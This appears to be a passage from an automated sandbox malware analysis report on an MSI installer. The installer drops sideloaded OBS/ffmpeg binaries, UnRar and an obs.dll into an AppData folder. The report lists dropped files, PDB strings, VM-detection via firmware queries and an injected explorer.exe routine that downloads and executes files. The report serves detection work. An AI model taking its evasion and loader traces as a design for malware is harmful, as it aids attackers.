Source: Binary string: obs-ffmpeg-mux.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp, obs-ffmpeg-mux.exe, 00000007.00000000.2304470611.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb;;;GCTL source: createdump.exe, 00000008.00000002.2309946294.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000000.2304497963.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\Projects\WinRAR\rar\build\unrar64\Release\UnRAR.pdb source: UnRar.exe, 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp, UnRar.exe, 00000005.00000000.2292652385.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: K064a7Rfk7.msi
Source: Binary string: Microsoft.Web.WebView2.Core.pdb source: K064a7Rfk7.msi
Source: Binary string: ucrtbase.pdbUGP source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.2.dr
Source: Binary string: w32-pthreads.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2338942242.00007FFDAC148000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: K064a7Rfk7.msi, MSIE1FA.tmp.2.dr, MSIE336.tmp.2.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: K064a7Rfk7.msi
Source: api-ms-win-core-synch-l1-2-0.dll.2.drStatic PE information: 0x8A188CB0 [Tue Jun 2 13:31:28 2043 UTC]
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EED32 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,7_2_00007FFD936EED32
Source: vcruntime140.dll.2.drStatic PE information: section name: _RDATA
Source: BCUninstaller.exe.2.drStatic PE information: section name: _RDATA
Source: createdump.exe.2.drStatic PE information: section name: _RDATA
Source: UnRar.exe.2.drStatic PE information: section name: _RDATA
Source: avformat-60.dll.2.drStatic PE information: section name: .xdata
Source: avutil-58.dll.2.drStatic PE information: section name: .xdata
Source: swresample-4.dll.2.drStatic PE information: section name: .xdata
Source: swscale-7.dll.2.drStatic PE information: section name: .xdata
Source: zlib.dll.2.drStatic PE information: section name: .xdata
Source: avcodec-60.dll.2.drStatic PE information: section name: .rodata
Source: avcodec-60.dll.2.drStatic PE information: section name: .xdata
Source: MSIE0DE.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE18B.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE1CA.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE1FA.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE249.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE289.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE336.tmp.2.drStatic PE information: section name: .fptable
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1CB60 pushfd ; retf 11_2_00C1CB61
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C19B01 push ecx; ret 11_2_00C19B14
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1CCCC push esp; iretd 11_2_00C1CCCD
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1CCE4 pushfd ; iretd 11_2_00C1CCE5
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C224A4 push edi; retn 0000h11_2_00C224CA
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C224A8 push edi; retn 0000h11_2_00C224CA
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21EC8 push ds; retn 0000h11_2_00C21ECA
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21EDB push ds; retn 0000h11_2_00C21EDE
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21E94 push ds; retn 0000h11_2_00C21E96
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1C63D push esi; ret 11_2_00C1C646
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21F10 push ds; retn 0000h11_2_00C21F16
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C049A0 ExitProcess,CreateThread,URLDownloadToFileA,GetFileAttributesA,Sleep,GetTempPathA,wsprintfA,GetFileAttributesA,CreateDirectoryA,wsprintfA,lstrlenA,lstrcpyA,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateFileA,WriteFile,CloseHandle,GetLastError,GetLastError,GetFileAttributesA,MoveFileA,GetLastError,GetLastError,ShellExecuteA,GetLastError,GetLastError,DeleteFileA,GetLastError,GetLastError,wsprintfA,lstrlenA,lstrcpyA,lstrlenA,GetProcessHeap,HeapFree,WaitForSingleObject,VirtualFree,11_2_00C049A0
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0DE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE18B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1FA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\zlib.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swscale-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avutil-58.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\msvcp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE336.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swresample-4.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE249.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1CA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE289.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avformat-60.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\w32-pthreads.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avcodec-60.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0DE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE289.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE336.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE18B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE249.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1CA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1FA.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EB840 FreeLibrary,free,calloc,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryExW,_aligned_free,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_errno,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryExA,FreeLibrary,free,wcslen,GetModuleFileNameW,_aligned_free,_aligned_free,_aligned_free,wcscpy,LoadLibraryExW,LoadLibraryExW,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,GetSystemDirectoryW,GetSystemDirectoryW,GetSystemDirectoryW,wcscpy,LoadLibraryExW,_aligned_free,_aligned_free,_aligned_free,_aligned_free,7_2_00007FFD936EB840
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D90 rdtsc 7_2_00007FFD93702D90
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE0DE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\msvcp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE336.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE249.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE18B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE1CA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE1FA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\zlib.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE289.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swscale-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeAPI coverage: 6.2 %
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeAPI coverage: 8.2 %
Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 7.3 %
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
